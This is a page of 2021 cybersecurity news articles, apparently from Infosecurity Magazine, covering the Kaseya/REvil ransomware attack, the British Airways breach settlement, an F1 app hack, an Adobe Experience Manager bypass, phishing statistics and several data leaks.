Cyber Risk News

US: We May Take Unilateral Action Against Russian Cyber-Criminals

Info Security - Wed, 07/07/2021 - 08:20
US: We May Take Unilateral Action Against Russian Cyber-Criminals

The White House has issued another strongly worded warning to the Putin administration: the US will take action against cyber-criminals living in Russia if the Kremlin doesn’t.

Press secretary Jen Psaki explained that the two countries are continuing “expert-level” talks in the wake of the meeting between Presidents Biden and Putin last month. Another talk focused on ransomware is scheduled for next week.

“I will just reiterate a message that these officials are sending,” she added. “As the President made clear to President Putin when they met, if the Russian government cannot or will not take action against criminal actors residing in Russia, we will take action or reserve the right to take action on our own.”

The news comes in the wake of a major new supply chain attack on US software provider Kaseya, which has affected around 1500 downstream organizations via their managed service providers (MSPs).

The attackers are said to have used the REvil/Sodinokibi variant, whose authors purportedly speak Russian, not least because the malware is coded not to infect any organizations residing in former Soviet countries.

However, given the large number of global affiliate groups using ransomware today, it’s far from clear whether this attack was launched by a Russian gang, even if the malware can be traced back there.

Psaki acknowledged this in the press briefing.

“The intelligence community has not yet attributed the attack. The cybersecurity community agrees that REvil operates out of Russia with affiliates around the world, so we will continue to allow that assessment to continue,” she said.

“But in our conversations — and we have been in touch directly — we are continuing to convey that message clearly.”

Biden revealed on Saturday that he had ordered the intelligence community to provide a “deep dive” on precisely what happened.

In the meantime, the official advice for any affected organizations continues to be to shut down any VSA servers and follow the mitigation steps from the Cybersecurity and Infrastructure Security Agency (CISA) issued over the weekend.

In related news, Kaseya explained in an update yesterday that its planned restoration of the VSA SaaS service had been delayed.

“During the VSA SaaS deployment, an issue was discovered that has blocked the release. Unfortunately, the VSA SaaS rollout will not be completed in the previously communicated timeline,” it noted.

“We apologize for the delay and R&D and operations are continuing to work around the clock to resolve this issue and restore service.”

Categories: Cyber Risk News

Hacker’s Mom Puts End to 10-Month Cyber-bullying Campaign

Info Security - Tue, 07/06/2021 - 18:49
Hacker’s Mom Puts End to 10-Month Cyber-bullying Campaign

A cyber-bullying campaign waged against a sixth grader from North Carolina for nearly a year appears to have been curtailed following its discovery by the abuser's mom.

For ten months, 12-year-old Wilson resident Jaylen White was on the receiving end of abuse so severe that he changed schools in a fruitless attempt to escape it and began having suicidal thoughts. 

The cyber-bullying was reported by White and his mother, Sheleen White, to school officials at Wilson Prep when it began disrupting White's remote learning. 

After the school failed to solve the problem, White was enrolled at Elm City Middle School, where he switched to strictly offline learning. 

“They (the school) deleted his account, and we went to paper packets all year,” said Sheleen White. 

White's mother reported the online abuse to her internet provider and to law enforcement officials, but the cyber-bullying campaign continued, with the perpetrator hacking into White's PlayStation account and ruining his games. 

Intimidating messages left by the cyber-bully would flash up on the screen while the Whites were watching movies on Netflix. 

One such message read: "I will stop if you kill yourself I promise." 

White's tormentor sent other messages stating that he knew where his victim was living. 

The Whites were also targeted with frequent fake 911 calls known as swatting attacks that brought emergency services to their home. Law enforcement agencies told the Whites that they did not possess the necessary equipment to be able to trace the calls. 

White became so distraught by the cyber-bullying that he considered taking his own life. 

“I remember him crying and saying, ‘Mom if I just do it, maybe they’ll leave us alone,’ ” Sheleen White told CBS17 News

“My child is being broken down to the point he is ready to leave the earth because someone is bothering him."

Last week, two new messages seemingly from the cyber-bully, appeared while the Whites were watching Netflix. 

"I won't hack you anymore. My mom caught me hacking you," read the first message, while the second one said, "She told me to apologize. I'm sorry for hacking you. Imma [sic] gonna disconnect from your stuff."

Since the messages were sent, the cyber-bullying has stopped. Sheleen said she wants to see whoever was behind the bullying caught and punished. 

Categories: Cyber Risk News

Official Formula 1 App Hacked

Info Security - Tue, 07/06/2021 - 18:34
Official Formula 1 App Hacked

Fans of Formula One International auto racing were sent strange messages over the holiday weekend after the sport's official app was hacked.

Forbes reports that the messages received by users of the F1 app over the July Fourth weekend are believed to be linked to a targeted cyber-attack. 

A spokesperson for F1 stated that no customer data is believed to have been compromised during the incident.

Two push notifications were sent out, the first of which, delivered at around 8pm CEST on Saturday, only contained the message "foo." Programmers have been known to use the metasyntactic variable "foo" as a placeholder for a value that can change, depending on conditions or on information passed to the program.

App users were then sent a not so confusing but more worrying message that read “Hmmmm, I should check my security.. :)”

The unsettling incident, which prompted F1 to launch an investigation, appeared to end there. 

Speaking to ESPN, an F1 spokesperson said that probe into the incident “confirms that this targeted attack was limited to the Push Notifications Service.”

The spokesperson went on to say that F1 will “continue to investigate, review and improve safety measures but, at this time, have no reason to believe that any customer data has been accessed during this incident.”

The hack raised some concern among the app's users. One user, Jonathan Koziel, left a two-star review for the app on July 3 along with the statement: "This review isn't of the app itself, its [sic] honestly great and it works beautifully though the ads can be annoying. Anyways, [sic] I want to raise a security concern. 

"A couple mins before writing this I got a notification that said "Hmmm, you should check your security.. :)" If anyone can get back to me I would greatly appreciate it."

"While this hack may only have resulted in a mischievous message being sent to users, it certainly had the potential to be much worse," commented Emsisoft's Brett Callow.

"In-app messages could, for example, be used to create very convincing phishing campaigns. If a message were well-crafted, users would have little reason to question it. The moral here is really that folks should be suspicious about everything."

Earlier this year, an augmented reality app operated by the Williams F1 team was disrupted due to a cybersecurity incident. 

The team had intended to reveal its 2021 challenger, the FW43B, via the app on March 5, but removed the app from online stores after it was hacked.

Categories: Cyber Risk News

BA Settles with Data Breach Victims

Info Security - Tue, 07/06/2021 - 17:00
BA Settles with Data Breach Victims

Compensation is to be paid to thousands of victims of a large-scale data breach at British Airways (BA). 

A legal claim was filed against the airline over a security incident that began in June 2018. Data belonging to around 420,000 people was compromised in a cyber-attack that went undetected for more than two months.

Between June 22 and September 5, 2018, a malicious actor gained access to an internal BA application through the use of compromised credentials for a Citrix remote access gateway.

The breach impacted personal data belonging to British Airways staff and to its customers in the United Kingdom, in the EU, and in the rest of the world. Magecart, a form of digital skimming code, was used by the attacker to collect and steal payment card information, names, and addresses.

An investigation by the Information Commissioner's Office (ICO) found the security measures put in place by British Airways to protect the vast quantities of personal data being processed were inadequate. 

In a penalty notice issued to BA in October 2020, the ICO stated: "After gaining access to the wider network, the attacker traversed across the network. This culminated in the editing of a JavaScript file on BA's website (www.britishairways.com). 

The edits made by the attacker were designed to enable the exfiltration of cardholder data from the 'britishairways.com' website to an external third-party domain (www.BAways.com) which was controlled by the attacker."

BA, which is a subsidiary of International Airlines Group, was initially slapped with a record-breaking fine of £183m by the ICO for violating GDPR. The fine was later reduced to £20m.

While settling the legal claim brought by some of the data breach victims, British Airways did not admit any liability. 

The airline has kept the terms of the settlement under wraps, so it is unclear how much each plaintiff will receive.

BA said it was "pleased we've been able to settle the group action."

Earlier this year, the compensation claim against British Airways was described by a law firm as "the largest group-action personal-data claim in UK history," involving more than 16,000 victims. 

Categories: Cyber Risk News

Industry Must Drive Forward International Collaboration on Cyber

Info Security - Tue, 07/06/2021 - 15:15
Industry Must Drive Forward International Collaboration on Cyber

The cybersecurity industry needs to push forward global collaborative efforts to combat cyber-threats. This was the message from a panel discussion during the UK Cyber Security Association’s One Day Summit Event.

Governments need to play a major role in facilitating alignment in this area. Still, the panelists believe the industry associations, who operate in and fully appreciate the increasingly dangerous cyber-threat landscape, must take the initiative for real progress to begin. Professor Lisa Short, director & co-founder of P&L Digital, emphasized that the digital world is borderless, and “the attacks we’re seeing have a global impact.” Despite this, countries are largely still operating in silos regarding cybersecurity, favoring a “nationalistic approach.” She added that as of yet, there hadn’t been a significant global event focused on cybersecurity among major world leaders. “We haven’t seen the 193 nations of the UN, the G7 or the G20 get up with industry experts and have a discussion on what can be done at a global level.”

Chris Windley, co-director of UK Cyber Security Association, noted that while there is much more governments can do to foster collaboration, “we can’t really wait for them, we have to act right now and communicate globally and cooperate.” He believes it requires the leadership and insights of industry organizations like the UK Cyber Security Association and the Cybersecurity Global Alliance to force change.

Short concurred, stating that government machinery is traditionally slow, and left to its own devices, cannot keep up with fast-moving and agile cyber-threat actors. Additionally, she said that most decision-makers do not have the technical knowledge required to enact the proper steps in this space. “Unless they start to have collaborative discussions with industry organizations, who’ve got very deep networks with a multidisciplinary approach, then they won’t address the challenges at the pace of change that we require,” she commented.

A critical aspect of this approach is for the industry to educate governments on just how serious a problem cyber-threats are and the potentially catastrophic impact they may have. James Castle, founder of Global Cyber Security Alliance, said governments need to start treating this thing as an act of terrorism,” adding that “once we have achieved that then the government will be able to start working with organizations.”

Once governments are working more closely with industry and treating cyber-threats with the seriousness they deserve, they can develop the necessary global infrastructure to foster collaboration. For example, Short advocated developing an international communication system, enabling intelligence to be rapidly passed between governments and organizations, in the same way as there are tsunami and terror warnings. “I don’t think there’s enough communication occurring when there’s intelligence known about potential movements in this space, potential attacks that have occurred and letting the rest of the world know in a much quicker way,” she outlined.

The cyber industry must be at the forefront of such an approach, according to Short. “We need to take this seriously and start to communicate and pass intelligence between organizations around the world.”

Bishakha Jain, senior cybersecurity consultant at IBM India, agreed that communication is key to global collaboration but cautioned that “there has to be a strategy in place.” To communicate effectively between different countries and organizations, “governments need to join hands with everyone to build it together.”

While there is a long way still to go in this space, Windley said that given the surge in high-profile cyber-attacks over the past year or so, we are seeing signs that governments are starting to take the issue more seriously. This includes measures recently introduced by US President Joe Biden in this area, such as an executive order mandating zero trust for all federal government software suppliers.

Categories: Cyber Risk News

Brits Lose Over £1bn in Fraud So Far This Year

Info Security - Tue, 07/06/2021 - 09:30
Brits Lose Over £1bn in Fraud So Far This Year

Brits have lost over £1bn to fraud and cybercrime in the first six months of 2021, according to money.co.uk’s latest Quarterly Fraud and Cyber Crime Report.

The analysis revealed that 81,018 fraud and cybercrime-related police reports were issued in Q2 2021, with UK residents experiencing a total loss of £382.3m due to these crimes. Interestingly, this represents a significant decrease compared with Q1 2021, when there were 137,695 reports. The personal finance advisory firm believes this decline is due to the easing of COVID-19 lockdown restrictions in Q2, as this reduced online activities.

However, financial losses per average victim were £176 higher in Q2 compared to Q1, at £4719.

The most common type of fraud and cybercrime in Q2 was related to online shopping and auctions, comprising one in five police reports (14,868). Victims lost a total of £11.9m to these types of activities.

The number of reports fell by half compared to Q1, which could be due to the reopening of non-essential retail in Q2, thereby reducing the volume of e-commerce transactions. Average losses per victim were 29% higher in Q2 than Q1 (£800 vs. £618).

According to the report, crimes relating to financial investments, share sales, or boiler room fraud proved to be most costly to victims in Q2. A total of 1309 victims lost £35.8m to these activities in this period, equating to £26,585 per person.

Dating scam victims also experienced heavy losses, at £13,558 each on average.

Breaking down the figures by age, Brits aged 30-39 were most commonly hit by fraud and cybercrime, making up 13,172 reports and a total of £37m lost.

Elderly UK residents (aged 70 and above) were more likely to fall victim to computer software and other advance fee frauds than any other age category. This population lost £34.2m to these crimes in Q2, with an average of £6,118 lost per case.

James Andrews, personal finance expert at money.co.uk, said: “Brits have lost more than £1bn as a result of fraudulent and cybercrimes, showing the extent fraudsters have taken advantage of online shoppers during the national lockdown.

“But it’s encouraging to see that cases have decreased significantly in the second quarter of the year, as life has started heading back towards normality. Still, with millions of pounds lost, it’s vital that individuals are aware of what they should be doing to protect themselves against fraudsters.”

Categories: Cyber Risk News

Japan Looks to Boost Military Cyber Experts Amid Security Threat

Info Security - Tue, 07/06/2021 - 09:07
Japan Looks to Boost Military Cyber Experts Amid Security Threat

The Japanese military is set to add hundreds of new cybersecurity specialists to its forces in the face of aggression from hostile nations, according to a new report.

Ministry of Defense plans seen by Nikkei revealed that there were 660 such personnel in the country’s Self Defense Forces (SDF) at the end of fiscal 2020. However, the plan is to increase this figure to 800 by the end of March 2022 and over 1000 by the end of 2023.

A single unit will also be created to look after unified cybersecurity for all three branches of the Japanese military — land, sea and air — in a bid to boost efficiency.

Such expertise is sorely needed in the face of increasing hostility from Chinese and Russian state-backed hackers and organized cybercrime.

In May last year, the government revealed it was investigating a potentially serious breach of national security after prototype plans for a hypersonic missile may have been stolen from Mitsubishi Electric.

The firm was purportedly bidding for a contract for the next-generation military technology, which has plunged the US, Russia and China into yet another arms race.

Sensitive employee data was also taken from the industrial giant by state operatives, it was reported.

According to a recent report from the British think-tank the International Institute for Strategic Studies, Japan lies at the bottom of a global “cyber power” ranking.

Despite its reputation for innovation, the country struggles to match the Five Eyes nations due to constitutional constraints on data collection, the report claimed. It was assessed as Tier Three, the lowest of the three-grade scale.

Alongside the new cyber recruits to the SDF, Japan’s defense ministry is also hiring experts from outside companies like NTT and LAC to work as part-time advisors.

A new cybersecurity training course was recently introduced at the Ground Self-Defense Force’s engineering school, and another program may be set up in collaboration with NTT, according to the report.

Categories: Cyber Risk News

Suspected Cyber-Criminal "Dr Hex" Tracked Down Via Phishing Kit

Info Security - Tue, 07/06/2021 - 08:42
Suspected Cyber-Criminal "Dr Hex" Tracked Down Via Phishing Kit

Security researchers have revealed how patient detective work enabled them to trace and identify a suspected prolific cyber-criminal, who was finally arrested in May.

A two-year investigation into the individual, who often went by the online moniker “Dr Hex,” ended when Interpol’s Operation Lyrebird swooped on the man in Morocco earlier this year.

Group-IB’s Threat Intelligence team claimed the individual was active since 2009 and allegedly responsible for phishing, defacing, malware development, fraud, and carding, resulting in thousands of unsuspecting victims. These included customers of French telecoms companies, banks and other multinationals.

The trail began when the threat intelligence team identified and deanonymized a phishing kit that was used to target a French bank. It found that almost every script used in the kit featured the name “Dr Hex” and an email address.

That email led them to a YouTube channel signed up under the same name, and in turn to an Arabic crowdfunding platform, which revealed another name associated with the individual. This name was apparently used to register two domains created using the email from the phishing kit.

“Using its patented graph network analysis technology, Group-IB researchers built a network graph, based on the email address from the phishing kit, that showed other elements of the threat actor’s malicious infrastructure employed by him in various campaigns along with his personal pages,” Group-IB said.

“A total of five email addresses associated with the accused were identified, along with six nicknames, and his accounts on Skype, Facebook, Instagram, and YouTube.”

Further analysis of this digital footprint revealed that from 2009 to 2018, the threat actor defaced over 130 web pages while also posting on underground platforms — indicating he was involved in malware development.

The research helped Interpol and Moroccan police finally track down the individual.

“This is a significant success against a suspect who is accused of targeting unsuspecting individuals and companies across multiple regions for years, and the case highlights the threat posed by cybercrime worldwide,” comments Interpol executive director of police services, Stephen Kavanagh.

“The arrest of this suspect is down to outstanding international investigative work and new ways of collaboration both with Moroccan police and our vital private sector partners such as Group-IB.”

Categories: Cyber Risk News

REvil Group Demands $70 Million for 'Universal Decryptor'

Info Security - Tue, 07/06/2021 - 08:19
REvil Group Demands $70 Million for 'Universal Decryptor'

The group behind the crippling supply chain ransomware attack on a US software company has reportedly demanded $70 million in return for a 'universal' decryption key, as researchers claim there could be thousands of global victims.

It’s believed that the REvil strain was used to compromise Kaseya’s VSA IT management software, although which ransomware affiliate is unknown.

However, as reported by the BBC, there has been surprise at the group’s request that the money be paid in Bitcoin, which is an easier to trace cryptocurrency than Monero.

In fact, individual ransom requests with affected organizations are apparently still being made in Monero, but the latest $70 million demand for a decryptor for all victims was issued in Bitcoin.

It’s unclear how many organizations are affected. The original estimate from Kaseya of “fewer than 40” was yesterday revised upwards to “fewer than 60.”

Many of these are managed service providers (MSPs) whose customers were affected. The software maker estimates around 1,500 downstream organizations of this sort were impacted — all of whom run its on-premises product.

Among these unlucky organizations are 500 Coop supermarkets in Sweden, 11 schools in New Zealand and two Dutch IT firms.

A report from Kaspersky yesterday claimed as many as 5000 attack attempts had been made in 22 countries since July 2.

The attack's impact may have been exacerbated as it was timed to coincide with the July 4 holiday weekend in the US, meaning many IT security professionals were off duty.

However, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) jointly released guidance for affected MSPs and their customers.

For the former, the advice included downloading Kaseya’s VSA Detection Tool, which is designed to scan systems for any indicators of compromise (IoCs).

Christos Betsios, cyber operations officer at Obrela, pointed out that REvil predecessor Gandcrab compromised Kaseya in the past to infect MSPs and their customers.

“The key is always to be prepared for the worst-case scenario, even if proper patch management and vulnerability management programs are in place, we are not secure anymore,” he added. “Attackers will continue to try to compromise big software vendors and distribute their malicious code via them.”

Categories: Cyber Risk News

Attacks on UK Firms Fall for First Time in Three Years

Info Security - Mon, 07/05/2021 - 10:08
Attacks on UK Firms Fall for First Time in Three Years

Recorded cyber-attacks against UK businesses have fallen for the first time since 2018, although hybrid working practices represent an ongoing risk, according to new data from Beaming.

The business ISP has been analyzing malicious traffic targeting its customers since 2016, in order to better understand the threat landscape.

It claimed that threat volumes dropped by 9% year-on-year in the second quarter of 2021, bringing them down to levels similar to Q1 2021 when businesses suffered just over 157,000 attacks each on average.

However, businesses should not let their guard down: Beaming customers were each hit by an average of 160,610 attempts to breach their systems in Q2 2021, which amounts to an attack every 49 seconds.

Although these will largely be low-level, automated threats, there’s still the potential to cause damage if defenses aren’t configured correctly — especially as organizations adapt to a new hybrid way of working.

Beaming managing director, Sonia Blizzard, explained that a surge in cyber-attacks early last year coincided with the first lockdown, indicating threat actor efforts to exploit under-protected home workers.

“Attacks have fallen to near pre-pandemic levels as more people returned to their workplaces, but businesses are still in the firing line and face new attacks every minute. We continue to urge caution,” she warned.

“Home and hybrid working remains a permanent fixture for lots of firms. Many of their people will access company data and IT systems via personal devices and unmanaged domestic internet connections. These new normal working practices are inherently insecure and increase the risk of a breach.”

Blizzard urged businesses to revisit their security strategy if they allow home working to minimize cyber risk.

Phishing emails designed to trick distracted home workers, exploits for unpatched software including VPNs, and hijacking of RDP endpoints protected by weak or breached passwords have been common tactics used to target remote working staff over the past year.

Most attacks from Q2 2021 were traced back to computers in China, followed by the US, India and Russia, Beaming said.

Categories: Cyber Risk News

US the Only Top Tier Cyber-power

Info Security - Mon, 06/28/2021 - 18:39
US the Only Top Tier Cyber-power

The United States of America stands alone as the only "top tier" cyber-power nation, according to a new research paper by the International Institute for Strategic Studies (IISS).

The London-based think tank assessed the cyber-prowess of 15 countries around the world for two years before ranking them into tiers according to their global state cyber-capacity. 

To gauge the cyber-power of each country, IISS examined a range of cyber capabilities, including the strength of the digital economy, core cyber-intelligence capability, cybersecurity and resilience, security functions, maturity of intelligence, and integration of cyber facilities with military operations.

The United States, despite falling victim to a swathe of cyber-attacks including recent assaults on the Colonial Pipeline and meat processor JBS, was the only country deemed advanced enough to occupy the top tier. 

"Since the late 1990s the US has moved more decisively than any other country to defend its critical information infrastructure in cyberspace, but it also recognizes that the task is extremely difficult and that major weaknesses remain," noted IISS.

Researchers found that the offensive cyber capabilities of the United States "are more developed than those of any other country," but also noted that "these capabilities have not yet been demonstrated at their full potential."

In the second tier are the United Kingdom, Australia, and Canada, which together with the US and New Zealand make up the members of the Five Eyes (FVEY) intelligence alliance. 

Appearing in tier two also are Russia, France, and the People's Republic of China. Occupying the third tier are India, Japan, Malaysia, North Korea, Iran, and Vietnam.

The report concluded that China, which boasts the world's second largest economy after the United States, suffers from poor security and weak intelligence analysis when it comes to cyber-power. 

IISS predicts that it will be another ten years at least before the PRC is able to give cyber-powerhouse United States a run for its money. 

The Institute found that while Russia and China have successfully carried out sophisticated cyber-offensives, both countries had holes in their cybersecurity that put them at a disadvantage compared to the countries in tiers one and two.

Categories: Cyber Risk News

Zero-day Exploit Found in Adobe Experience Manager

Info Security - Mon, 06/28/2021 - 16:18
Zero-day Exploit Found in Adobe Experience Manager

A zero-day vulnerability has been discovered in a popular content management solution used by high-profile companies including Deloitte, Dell and Microsoft.

The bug in Adobe Experience Manager (AEM) was detected by two members of Detectify’s ethical hacking community. If left unchecked, the weakness allows attackers to bypass authentication and gain access to CRX Package Manager, leaving applications open to remote code execution (RCE) attacks.

"With access to the CRX Package Manager, an attacker could upload a malicious package in Adobe Experience Manager to leverage it to an RCE and gain full control of the application," said a Detectify spokesperson.

Detectify Crowdsource members Ai Ho (@j3ssiejjj) and Bao Bui (@Jok3rDb) uncovered the vulnerability and named it AEM CRX Bypass. 

The pair found that several large organizations were affected by the bug, including Mastercard, LinkedIn, PlayStation and McAfee. 

The vulnerability occurs at CR package endpoints and can be remediated by blocking public access to the CRX consoles. 

A Detectify spokesperson explained: "The CRX Package Manager is accessed by bypassing authentication in Dispatcher, Adobe Experience Manager’s caching and/or load balancing tool. 

"Dispatcher checks user’s access permissions for a page before delivering the cached page and is an essential part of most – if not all  – AEM installations. It can be bypassed by adding a lot of special characters in combination in the request."

Security researcher Bao Bui is a former CTF player of the Meepwn CTF Team who started hunting bug bounties around a year ago. Security engineer and developer Ai Ho has been active on the bug bounty scene for two years, building his own bug-catching tools and sharing them on GitHub.  

The zero-day flaw was reported to Adobe, who swiftly released a patch for it. The AEM CRX Bypass zero-day was then implemented as a security test module on Detectify’s platform. 

"Since it went live in May 2021, around 30 instances of the AEM CRX Bypass vulnerability have been in customers’ web applications," said a Detectify spokesperson. 

Detectify's scans for more than 80 unique AEM vulnerabilities have generated over 160,000 hits in total so far. 

Categories: Cyber Risk News

Kentucky Healthcare System Exposes Patients’ PHI

Info Security - Mon, 06/28/2021 - 15:36
Kentucky Healthcare System Exposes Patients’ PHI

A healthcare system located in Kentucky is notifying more than 40,000 patients of an error that saw their personal health information (PHI) emailed to the wrong address. 

UofL Health, which is based in Louisville, consists of five hospitals, four medical centers, nearly 200 physician practice locations, more than 700 providers, the Frazier Rehab Institute and Brown Cancer Center.

Earlier this month, the system notified the Health and Human Services Office for Civil Rights of an email security incident involving the unauthorized disclosure of data belonging to 42,465 individuals. 

Patients’ PHI was put at risk when it was erroneously sent to an email address outside of the health system’s network. According to UofL, the accidental recipient of the data did not view or access any patient information.

The healthcare system, which employs more than 12,000 physicians, surgeons, nurses, pharmacists and other highly skilled health care professionals, did not state what data was contained within the email.

In a notice posted to its website, UofL Health stated: “On June 7, we sent some of our patients a letter explaining that we had recently discovered that some UofL Health emails containing some of their health information were sent to an external domain. We provided that notice based on our best knowledge as of that day."

The notice went on to say that the email had since been deleted and that the safety of the data had been investigated.

“The next day, on June 8, we received a response from the owner of the external domain, providing us with technical evidence that the emails we were concerned about were never viewed or accessed, and have been deleted," said UofL Health.

"We are relieved that our patients’ information is not at risk as a result of this incident, though we wish that information would have come to us sooner."

Patients whose data was impacted by the incident have been offered free identity protection services.

Earlier this year, Kentucky-based Health Plan Humana was affected by a data breach that impacted 62,950 plan members. Cotiviti, one of the company's subcontractors, inappropriately disclosed data to unapproved individuals for training purposes for three months from October 2020. 

Categories: Cyber Risk News

Seamless EU-UK Data Flows to Continue Following Adequacy Decisions

Info Security - Mon, 06/28/2021 - 13:52
Seamless EU-UK Data Flows to Continue Following Adequacy Decisions

The European Union (EU) has formally granted the UK adequacy status, allowing the flow of personal data between the two regions to continue seamlessly.

Earlier today, it was announced that the EU adopted two adequacy decisions for the UK – one under the General Data Protection Regulation (GDPR) and the other for the Law Enforcement Directive. These acknowledge that UK data protection rules are “essentially equivalent” to EU standards in both areas.

The decisions by the EU Commission will be of significant relief to businesses operating in the two jurisdictions, as it means additional arrangements will not be needed to allow data to be transferred from the EU to the UK.

The announcement has been pending ever since the EU-UK Trade and Cooperation Agreement, which governs the UK and EU’s future trading relationship following the Brexit transition period, came into force as of January 1 2021.

The EU commission first published draft decisions granting the UK adequacy status in the two areas back in February 2021. Still, these had to be shared with the European Data Protection Board for a ‘non-binding opinion’ before being put to EU member states to approve formally. The board then gave approval to these draft decisions in April but highlighted a number of areas that required further assessment, including “the role and powers of the security services.”

There were concerns the latter could prove to be a sticking point, especially as it formed the basis of the ‘Schrems II’ decision in June 2020 by the Court of Justice of the European Union, which invalidated the privacy shield between the EU and US. However, these fears have proven to be unfounded, with the Commission acknowledging that the UK’s system allows for solid safeguards regarding access to personal data by public authorities, notably for national security reasons.

The EU did emphasize that both adequacy decisions include safeguards if the UK diverges from its current arrangements in the future. These include a ‘sunset clause,’ limiting the duration of the adequacy to four years. 

Didier Reynders, EU Commissioner for Justice, commented: “After months of careful assessments, today we can give EU citizens certainty that their personal data will be protected when it is transferred to the UK. This is an essential component of our new relationship with the UK. It is important for smooth trade and the effective fight against crime. The Commission will be closely monitoring how the UK system evolves in the future, and we have reinforced our decisions to allow for this and for an intervention if needed. The EU has the highest standards when it comes to personal data protection, and these must not be compromised when personal data is transferred abroad.”

The UK Secretary of State for Digital, Oliver Dowden, welcomed the decisions, stating: “After more than a year of constructive talks it is right the European Union has formally recognized the UK’s high data protection standards.

“This will be welcome news to businesses, support continued cooperation between the UK and the EU, and help law enforcement authorities keep people safe.

“We will now focus on unlocking the power of data to drive innovation and boost the economy while making sure we protect people’s safety and privacy.”

Categories: Cyber Risk News

Reported HMRC-Branded Phishing Scams Grew by 87% During COVID-19

Info Security - Mon, 06/28/2021 - 12:56
Reported HMRC-Branded Phishing Scams Grew by 87% During COVID-19

Suspected HMRC-branded phishing scams grew by 87% during the COVID-19 pandemic, according to official figures obtained by accountancy group Lanop Outsourcing following a Freedom of Information (FoI) request.

This data revealed that reports of phishing scams impersonating the UK’s tax, payments and customs authority surged from 572,029 in the financial year 2019-20 to 1,069,522 from April 2020 to April 2021.

Messages related to tax rebates or refunds made up the majority of reported scams, comprising 690,522 out of a total of 1,069,522 that were recorded in 2020-21. This compares to 636,118 in 2019-20. This increase is likely a result of cyber-criminals looking to exploit the creation of a number of financial relief packages introduced by the UK government during COVID-19.

There was also a substantial rise (66%) in suspected voice scam attacks in this period, from 203,362 reports in FY 2019-20 up to 690,522 in FY 2020-21.

Email was the most commonly used vector to launch suspected HMRC-branded phishing attacks in this period, according to the figures. These rose by 109% compared to the previous year, from 301,170 to 630,193. Sharp rises were also observed concerning suspected phone call scams (up 66%) and SMS scams (up 52%) over this period.

Additionally, reports for scams impersonating the Driver and Vehicle Licensing Agency (DVLA), which HMRC receives reports for, increased by a colossal 661%, from just 5549 cases in 2019-20 to 42,233 in 2020-21.

Tim Sadler, CEO of Tessian, pointed out that “Impersonating an authoritative organization like HMRC is a tried and tested way for cybercriminals to create a sense of urgency and fear, in order to manipulate people into sharing financial information or credentials via phishing or smishing scams. And they’ve upped the ante, particularly over the past 12 months, in the hope that by sending more emails, more people might fall for their schemes.

“Sadly, spotting the scams isn’t always easy, and hackers are making them even harder to detect. The general rule is to never click on links in unexpected texts or emails, even if you feel under pressure. Remember, you can always verify the request is real by calling the company directly or checking your online account.”

The new figures chime with official data released in November 2020, which showed that HMRC detected a 73% rise in email phishing attacks in the first six months following the start of the COVID-19 pandemic.

Categories: Cyber Risk News

Mercedes Benz Data Leak Includes Card and Social Security Details

Info Security - Mon, 06/28/2021 - 09:53
Mercedes Benz Data Leak Includes Card and Social Security Details

Mercedes Benz has released details of a data breach affecting customers and prospective buyers in the US.

The luxury carmaker said a vendor had informed the company on June 11 that the information was “inadvertently made accessible on a cloud storage platform.” It appears that a third-party security researcher first raised the alarm.

Although the initial investigation was set to discover whether 1.6 million unique records had been exposed, subsequent findings indicated far fewer customers and interested buyers were affected.

“The vendor reports that the personal information for these individuals (less than 1,000) is comprised mainly of self-reported credit scores as well as a very small number of driver’s license numbers, social security numbers, credit card information and dates of birth,” the statement noted.

“To view the information, one would need knowledge of special software programs and tools — an internet search would not return any information contained in these files.”

These individuals entered the information in question on dealer and Mercedes-Benz websites between January 1, 2014, and June 19, 2017.

Mercedes Benz USA confirmed that none of its systems were compromised in the incident and said the issue had been mitigated by the security vendor and can’t happen again.

Although it’s unlikely that threat actors managed to locate and access the information, it’s unclear how long it had been exposed for.

Mercedes-Benz USA has begun notifying those affected and said that anyone who had credit card information, driver’s license or social security numbers exposed will be offered a free 24-month subscription to a credit monitoring service.

Tom Garrubba, CISO at risk management firm Shared Assessments, welcomed the carmaker’s prompt action.

“With all the cyber-incidents that have been reported recently, it is refreshing to see that swift action taken by Mercedes Benz USA in addressing the incident with their cloud service provider and ultimately, with their customers," he added.

“The reported breach of 1000 existing and prospective customers via their cloud storage vendor’s platform should raise awareness of the importance of proper due diligence and understanding as to how your cloud service providers are protecting your data.”

Categories: Cyber Risk News

Sensitive Defense Documents Found at Bus Stop

Info Security - Mon, 06/28/2021 - 09:22
Sensitive Defense Documents Found at Bus Stop

Classified Ministry of Defence (MoD) documents have reportedly been discovered at a bus stop in southern England, raising concerns over national security.

Nearly 50 pages were found by a member of the public behind the bus stop in Kent last Tuesday and shown to the BBC.

They are said to contain printed emails and PowerPoint presentations from a senior official at the MoD.

These include information on the decision-making process that saw a Type 45 destroyer, HMS Defender, sail in a controversial “freedom of navigation” manoeuver close to Russian-annexed Crimea last week.

Other documents in the trawl reportedly included discussions of arms exports campaigns, briefing notes on President Biden’s first few months in office, and the role of British special forces in Afghanistan once the US pulls out.

Most of the documents are said to have been marked “official sensitive,” which is a fairly low classification level. However, the Afghanistan document, intended for defense secretary Ben Wallace, was labeled “Secret UK Eyes Only” — indicating a high level of sensitivity.

Apricorn’s EMEA managing director, Jon Fielding, said the incident was “disturbing” given the efforts underway in many organizations to secure sensitive documents digitally.

“We don’t know how the documents came to be there, but this should serve as another wake-up call for the government to take the need to secure sensitive data more seriously,” he argued.

“The public and private sector are adapting to a new way of working that requires data to be transferred between the office and other, less secure environments. This can only be achieved safely by digitizing documents, which brings indisputable benefits when it comes to data encryption, transfer, storage, online/offline back-ups, and management.”

Concerns are increasingly being raised about levels of cyber-risk at the MoD.

There was a reported 18% rise in data loss incidents at the ministry from 2019-20, several of which had to be reported to the Information Commissioner’s Office (ICO).

In March this year, a separate report, based on Freedom of Information (FOI) data, claimed security incidents at contractors had doubled over the previous 12 months.

The MoD is currently carrying out an investigation into the latest document data leak.

Categories: Cyber Risk News

Former Health Secretary Faces Probe Over Use of Personal Emails

Info Security - Mon, 06/28/2021 - 08:43
Former Health Secretary Faces Probe Over Use of Personal Emails

Former health secretary Matt Hancock is facing further pressure this week after Labour called for an investigation into his alleged use of personal email to conduct official government business.

Hancock was forced to resign after CCTV footage leaked last week showed the married Tory MP in a romantic embrace with an advisor in his Whitehall office, breaking social distancing guidelines.

Labour deputy leader, Angela Rayner, has now called on the cabinet secretary to launch an inquiry into whether private emails were used to discuss the awarding of government contracts during the pandemic.

“We need to know how much government business is being conducted in secret by ministers using private email accounts to avoid scrutiny, hide information from the public inquiry into COVID and do dodgy deals for government contracts with their mates,” she tweeted today.

